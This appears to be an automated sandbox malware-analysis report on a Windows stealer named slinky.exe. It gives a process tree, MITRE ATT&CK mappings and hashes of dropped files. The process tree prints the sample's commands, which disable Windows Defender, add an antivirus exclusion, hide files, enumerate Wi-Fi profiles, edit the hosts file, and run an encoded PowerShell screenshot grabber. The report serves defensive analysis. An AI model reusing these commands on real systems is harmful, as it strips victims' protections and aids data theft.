- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5324
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Downloads\slinky\slinky\slinky.exe
  2⤵
  - Views/modifies file attributes
  PID:4872
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:5420
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5244
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:5508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\Downloads\slinky\slinky\slinky.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5492
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  PID:5496
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:3128
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:5656
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:4444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3996
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:3016
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Views/modifies file attributes
  PID:2388
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Views/modifies file attributes
  PID:6028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  PID:5832
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ij4vx2w2\ij4vx2w2.cmdline"
    3⤵
    PID:3144
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE9A.tmp" "c:\Users\Admin\AppData\Local\Temp\ij4vx2w2\CSC8095FB9467D64D639FE741453A78CD7.TMP"
      4⤵
      PID:3456

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ab8ce148cb7d44f709fb1c460d03e1b0

SHA1
44d15744015155f3e74580c93317e12d2cc0f859

SHA256
014006a90e43ea9a1903b08b843a5aab8ad3823d22e26e5b113fad5f9fa620ff

SHA512
f685423b1eaee18a2a06030b4b2977335f62499c0041c142a92f6e6f846c2b9ce54324b6ae94efbbb303282dcda70e2b1597c748fddc251c0b3122a412c2d7c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
38f59a47b777f2fc52088e96ffb2baaf

SHA1
267224482588b41a96d813f6d9e9d924867062db

SHA256
13569c5681c71dc42ab57d34879f5a567d7b94afe0e8f6d7c6f6c1314fb0087b

SHA512
4657d13e1bb7cdd7e83f5f2562f5598cca12edf839626ae96da43e943b5550fab46a14b9018f1bec90de88cc714f637605531ccda99deb9e537908ddb826113b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022

Filesize
17KB

MD5
950eca48e414acbe2c3b5d046dcb8521

SHA1
1731f264e979f18cdf08c405c7b7d32789a6fb59

SHA256
c0bbe530abfce19e06697bc4358eb426e076ccdb9113e22df4a6f32085da67a2

SHA512
27e55525ade4d099a6881011f6e2e0d5d3a9ca7181f4f014dc231d40b3b1907d0d437b0c44d336c25dd7b73209cd773b8563675ac260c43c7752e2d2d694d4d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
99e664a87bdc71acb55eca7893049b15

SHA1
d2ae7615aac4245151f54783766a0533a76efab8

SHA256
88a637a8fb0d1c8adf75e6958ca243dd9418927913b48670b606727349037569

SHA512
92424f3d1729b20e1b6c213faabc4bc56d243dc273126d3c10f850494e978cf141c856a4c2e70300611e50ae9cc0e6be4c94148526fbb727fb5705500185bd58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
59bfc882c8618cde4d4a015616a0105e

SHA1
c1dcd78cd05146ea0b06d698be2bf5fe8e3f536e

SHA256
03ea402ec207d695ac8f06173c4354e9755dc621e2b700a46574d142632bff5c

SHA512
a393b6ab7321050e3b2964fc1619c14f1234704521ac2dca443824029f85de2aebdb12457809e73b71c40cd95164bbea4e1fa92400ee540648988eb108027954

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
261B

MD5
290f70dae7af9f71878a40d9290744b3

SHA1
a95fb6b9a01006cd9c1d955d6d3adcf7cdd317b0

SHA256
ba978f9f2c6ea9af60df69984c9bb2271c24639dc6397151a121b8c37a615952

SHA512
fab1b286f837b0a09298515353b261d6a089aed7ddb0b7e13fa93ea1e58869759e5447d5a658abf938897d68646da7e762ac18c93d00e777b20d3200d222c15c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
807419ca9a4734feaf8d8563a003b048

SHA1
a723c7d60a65886ffa068711f1e900ccc85922a6

SHA256
aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631

SHA512
f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
188B

MD5
008114e1a1a614b35e8a7515da0f3783

SHA1
3c390d38126c7328a8d7e4a72d5848ac9f96549b

SHA256
7301b76033c2970e61bab5eaddaff5aa652c39db5c0ea5632814f989716a1d18

SHA512
a202fc891eace003c346bad7e5d2c73dadf9591d5ce950395ff4b63cc2866b17e02bd3f0ad92749df033a936685851455bcdbfad30f26e765c3c89d3309cb82b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
452dcbb2a783c5a44aaac071479599f3

SHA1
83c4f3856efca4b17ad9128e205db74b6cfb3746

SHA256
f030b89d2ff8cb95a28c77c121615b9a7de9c2a50745e1e5b927fc2317b15139

SHA512
689a7ff3602dac166879f46457f3d3e21aad167fe5ac566eb4d59351609043c67e7f8b9bd7502ad60e44f76462016d608043c2b1fe457c7d0b6132de0d58ecc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
d2dea5d335dbbfee770358cbc7a4bc8c

SHA1
57a1a4dde3c97dc28bc0c02f00929b37ab85a42d

SHA256
f37ce7609b04d7636d6ed94b28f4414473fe73585acd88ed2367dae5fe5fce2d

SHA512
09969a711024191814fe343525eb19561c62b6b9378e9a481b0bbef3842eeb783244c3ea398bc83d1ba50d094fc8ac6a5f1181a9b2e13e76115a893461e18961

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ebab3c5c4338ce4e851e799f637a639e

SHA1
12b2cf41834d0283fa1bcdc54fdc90161c6d77df

SHA256
8af6be8db2d7af3016d58e29039aefe6a27d72f3e571e5018dec1bb40c9d5c0d

SHA512
627e3bdb3b782b32e14112221413b2a4ec24a875fd936c871a321f145e8e0e95b4cb2f40769e0a8a22448066ea791b7623f60fea3fa4fea7f1448f53f87c889b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
96f7cd7aaf99656c74acfdc497df7362

SHA1
48cb742087c7a8b4920c00f5d0c5778cb37deb0c

SHA256
dc7f16affbfa1998cd0a2cac8914c96eb0ee5a9a8d592dda5f19b4680d71bb31

SHA512
574add313c7c44559797e88981705d372a3ebbfdf8f591707e7dea3ba153ee73acdd944966cb68b7ce2552b21fcb13ea0abf994f6e9fee2e7da53ee359e4c79e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5824aa.TMP

Filesize
48B

MD5
2e2e9e8c02992a587fed86945bf1ea3a

SHA1
e5ed17f9962c9e067b00c5066f9a49c98900d430

SHA256
e49b51467ef5ed37d32b33dee2b55b1f0c0554a58e199b17382057fb28f7d772

SHA512
f3f9c012d9ffb385fb6810f833f82775a8819736be8a523b827d74db9e2cdd0b0c8f49ee950ae5953ce5d2fb0c11bb5f614e4a9dfb6e5839198fe351a26061b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
bd3af54a47ce70311a2bd227d5509a96

SHA1
3e98c7414ed515fafda00f6830dc04feda7d0013

SHA256
c7e713ff020948471fe17264ddd0aa78cc7b7071d7cd3d25104cbf1dc63787ee

SHA512
4a46b84b6130f8d837f7aa3150fb414eb28e4d50a538f812fc6d19fe21204f71a81e35525b47fee9b4210284095cc56b2f2976e7b7fc1059dfc1fc31f4ffa45f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
4288122a692c487867cb22cfd972942b

SHA1
3e71b24c25e00d704f45cc561e07c154dd042701

SHA256
fce7e2514dc0924efecd771ad42927ffcfde71a5de16f497f6472bbb106091c0

SHA512
072a2ba98e05051f5e71bc488be07513006419185a7f342c13ca1dbbaccb7beca0702e9036ebc526a0821229cca751899088807e393247f69f43c389c66f47da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESAE9A.tmp

Filesize
1KB

MD5
fbd5e4ea0087318687be1a0455cbd243

SHA1
706f1c0207335e9ce9cc14ab8d290e95a5cf238e

SHA256
d777dabbcc4dca25652a92eb2328c406f1b9092518adda5c1c4971feacd2b7b4

SHA512
2ef6331cffbb0d8750a0c741baf4b26062b1ec0fe9ece6db6213af7fc8f4065ed25d049e7dbd01d35bfad59c9afd74d74c18888561b3f3a779eed5ca6ddcc0b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zcbhga5g.3ts.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ij4vx2w2\ij4vx2w2.dll

Filesize
4KB

MD5
902faac00d8fed4045a229ae535a60b3

SHA1
c6722807805922bf4e6030323ac55a0b80cc8711

SHA256
ebf1b05df669d63e6cb0f626d8d66e12198bc2af03d1073003cbe5817c64b3e0

SHA512
21ec7bb2d57545b3b38fba4cb183a623d7b22d6994645d84bf06c8d3e9404016af59fb3dbec2cf7d65373157ae1a392b58d971f00f732aa5d188ec9dc7df2cf3

Download Submit
C:\Users\Admin\AppData\Local\Temp\lkopX0PlWd\Display (1).png

Filesize
77KB

MD5
ed9ae3013de22f6b67087580af07b64a

SHA1
3d38fbd475b9b4fe139555c25d0cb4901475aeb5

SHA256
3b2aedfaf0db0260d5032eb40b0eefd2eb7d0b6c1846f565e1e1fbe5d45ee819

SHA512
e9a604302110ade27a105a45de061c9d14f695fb2753d18821b7861abf8417038d88c003052b3ac7b174fda413a8acbb731881bfd4f372779028dd6960dc144a

Download Submit
C:\Users\Admin\Downloads\slinky.rar

Filesize
26.1MB

MD5
e4c3235258973ae18006e091590c8221

SHA1
c8e137b71c6cf3f7d4b6e4aee5b8a124aec3e479

SHA256
e4732e5ae888b2ab9a24fc709a72d1d8129323dbef98d206c747d737569deaff

SHA512
339d74738b2ce7bc712c3197fc0cc56b7a202e00216e28e2ca23faff9137f214a831cb76edc98ccf99aa69ec91e47689bb5c021835c00ae5299f245d3afde6f7

Download Submit
C:\Users\Admin\Downloads\slinky\slinky\slinky.exe

Filesize
14.2MB

MD5
59a08bb8bf4881e814fd3d36f525da8a

SHA1
3f542be6b20daef732a4c4bee9bad1dde8b375f0

SHA256
03da816f34074a5e1941ababc4cbab2880d149a03b1b3b1000cf065479d50272

SHA512
dfc2c2a0c743918642943d296c3b26367d80ce49d3c0ee099c27398ed134a965203014b1b0346e41d882531f8d0bdb878cc38ee1c2420844bd9cfd70677e002a

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ij4vx2w2\CSC8095FB9467D64D639FE741453A78CD7.TMP

Filesize
652B

MD5
7415bfc2a7eddd90db04a9c8e7b662fc

SHA1
4114a93c3f3846e35850efd76917a852d770cc30

SHA256
df195df617837eef440be110971babe0fc2e4610160a6a0340728c0aa2f56ced

SHA512
6c4577874730ccc798545d87f1fd26d22ca86a3f84be0655864a391b2e10ba2e61c510461fbc194ac7744ce82c198324a4d26e2d89ace6c556cf76aa4289a0c3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ij4vx2w2\ij4vx2w2.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ij4vx2w2\ij4vx2w2.cmdline

Filesize
607B

MD5
c02150b55257959ec50f8727c4420d1f

SHA1
c717dc0f68a49a7ecc74376f6b53ebb9a6563856

SHA256
1e14ac5fa475209967c80dee5b447bd7de08585cc13310891ae915e74285699a

SHA512
f19ed31b39384b352d51555ee9d5cc4b45c84a1e81528474a6cafca8be26e3977e01ef5bf169a16823ef31d42ca655de458acb6c2243ed5bdc3343faa2ca3fec

Download Submit
memory/5492-237-0x0000025D3C600000-0x0000025D3C622000-memory.dmp

Filesize
136KB

Download
memory/5832-298-0x0000028010DD0000-0x0000028010DD8000-memory.dmp

Filesize
32KB

Download